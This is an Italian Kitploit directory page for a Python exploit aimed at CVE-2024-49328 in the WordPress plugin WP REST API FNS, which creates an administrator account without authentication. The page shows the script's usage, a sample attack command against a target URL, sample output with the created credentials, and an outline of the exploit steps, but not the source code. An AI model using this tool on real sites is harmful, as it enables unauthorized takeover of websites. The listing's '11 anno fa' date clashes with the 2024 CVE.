Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-49328-exploit — Script Python per sfruttare una vulnerabilità di escalation dei privilegi nel plugin WordPress WP REST API FNS, che consente la creazione non autenticata di account amministratore. | Kitploit
Strumenti/GitHubGitHub/nxploited/cve-2024-49328-exploit
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed Teaming
GitHubnxploited/cve-2024-49328-exploit

CVE-2024-49328-exploit

Script Python per sfruttare una vulnerabilità di escalation dei privilegi nel plugin WordPress WP REST API FNS, che consente la creazione non autenticata di account amministratore.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
11 anno faNon ancora revisionato

CVE-2024-49328-exploit

🌟 Descrizione:

Questo script sfrutta una vulnerabilità di escalation dei privilegi nel plugin WP REST API FNS per WordPress. La vulnerabilità interessa tutte le versioni fino alla 1.0.0 inclusa, consentendo a utenti non autenticati di ottenere privilegi di amministratore.

⚙️ Utilizzo

root@kitploit:~


options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Base URL of the WordPress site
  -e NEWEMAIL, --Newemail NEWEMAIL New email to register
  -p PASSWORD, --password PASSWORD Password for the new user
                        

Comando di esempio:

root@kitploit:~
python CVE-2024-49328.py -u http://targetsite.com -e [email protected] -p password123

🔍 Dettagli dello sfruttamento

➡️ Esempio di output

root@kitploit:~

Found Stable tag version: 1.0.0
Version 1.0.0 is exploitable.
Exploiting the site... Please wait.
Successfully
Username: [email protected]
Password: nxploit

Installa i pacchetti richiesti

root@kitploit:~
pip install requests

⚠️ Avvertenza

🚨 Avvertenza:

Questo script è solo per scopi educativi. L'uso non autorizzato di questo script su sistemi senza esplicito permesso è illegale e non etico.

Scarica lo strumento
PassoDescrizioneIcona
Passo 1Verifica della versione del plugin.📝
Passo 2Controlla se la versione è sfruttabile (1.0.0 o precedenti).✅
Passo 3Sfrutta la vulnerabilità e registra un nuovo utente admin.🔒
Passo 4Stampa il risultato con le credenziali utente per la verifica.🎉